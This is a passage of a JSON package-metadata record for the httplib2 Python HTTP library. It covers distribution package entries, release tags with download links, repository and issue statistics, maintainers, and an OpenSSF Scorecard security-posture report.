l":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T14:22:35.401Z","dependent_packages_count":3,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":6.708380346702227,"stargazers_count":5.50825725715458,"forks_count":3.8670632885424148,"average":4.020925223099805},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.9","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":259,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-01T04:54:37.999Z","updated_at":"2023-02-01T04:54:37.999Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.9","url":"https://pkgs.alpinelinux.org/packages?branch=v3.9","ecosystem":"alpine","default":false,"packages_count":9749,"maintainers_count":154,"namespaces_count":2,"keywords_count":832,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":361},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.805Z","updated_at":"2026-08-18T05:03:05.558Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.9/namespaces"}},{"id":13411212,"name":"python-httplib2","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/httplib2/httplib2","licenses":"other","normalized_licenses":[],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["libs"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-06T20:21:51.011Z","latest_release_published_at":"2026-02-06T20:21:51.011Z","latest_release_number":"0.20.2-2","last_synced_at":"2026-07-27T00:02:54.188Z","created_at":"2026-02-06T20:21:50.748Z","updated_at":"2026-08-21T14:22:36.082Z","registry_url":"https://launchpad.net/ubuntu/+source/python-httplib2","install_command":"apt-get install python-httplib2","documentation_url":null,"metadata":{"component":"main","architecture":"all","priority":"optional","binary":"python3-httplib2","standards_version":"4.6.0","maintainer":"Debian Python Team \u003cteam+python@tracker.debian.org\u003e","build_depends":"ca-certificates, debhelper-compat (= 13), dh-python, python3-all, python3-mock, python3-pytest, python3-pytest-timeout, python3-setuptools","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{